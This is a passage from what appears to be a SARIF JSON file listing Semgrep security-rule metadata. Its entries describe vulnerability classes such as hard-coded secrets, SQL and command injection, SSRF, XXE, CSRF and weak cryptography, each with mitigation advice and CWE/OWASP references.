data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","id":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","name":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","id":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","name":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"help":{"markdown":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"helpUri":"https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","id":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","name":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"help":{"markdown":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","id":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","name":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite)\n - [https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application](https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","id":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","name":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","id":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","name":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"help":{"markdown":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure)\n - [https://cwe.mitre.org/data/definitions/209.html](https://cwe.mitre.org/data/definitions/209.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n","text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","id":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","name":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","properties":{"precision":"very-high","tags":["CWE-209: Generation of Error Message Containing Sensitive Information","HIGH CONFIDENCE","OWASP-A04:2021 - Insecure Design","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","id":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","name":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection)\n - [https://www.php.net/manual/en/ref.exec.php](https://www.php.net/manual/en/ref.exec.php)\n - [https://www.php.net/manual/en/ref.filesystem.php](https://www.php.net/manual/en/ref.filesystem.php)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection","id":"php.laravel.security.laravel-command-injection.laravel-command-injection","name":"php.laravel.security.laravel-command-injection.laravel-command-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-command-injection.laravel-command-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","id":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","name":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"help":{"markdown":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv)\n - [https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection](https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection)\n","text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv","id":"python.lang.security.audit.conn_recv.multiprocessing-recv","name":"python.lang.security.audit.conn_recv.multiprocessing-recv","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.conn_recv.multiprocessing-recv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"help":{"markdown":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection)\n - [https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n","text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection","id":"javascript.express.security.audit.remote-property-injection.remote-property-injection","name":"javascript.express.security.audit.remote-property-injection.remote-property-injection","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.remote-property-injection.remote-property-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"help":{"markdown":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password)\n - [https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation)\n","text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password","id":"python.django.security.audit.unvalidated-password.unvalidated-password","name":"python.django.security.audit.unvalidated-password.unvalidated-password","properties":{"precision":"very-high","tags":["CWE-521: Weak Password Requirements","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.unvalidated-password.unvalidated-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"help":{"markdown":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"helpUri":"https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg","id":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","name":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.java-jwt.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with 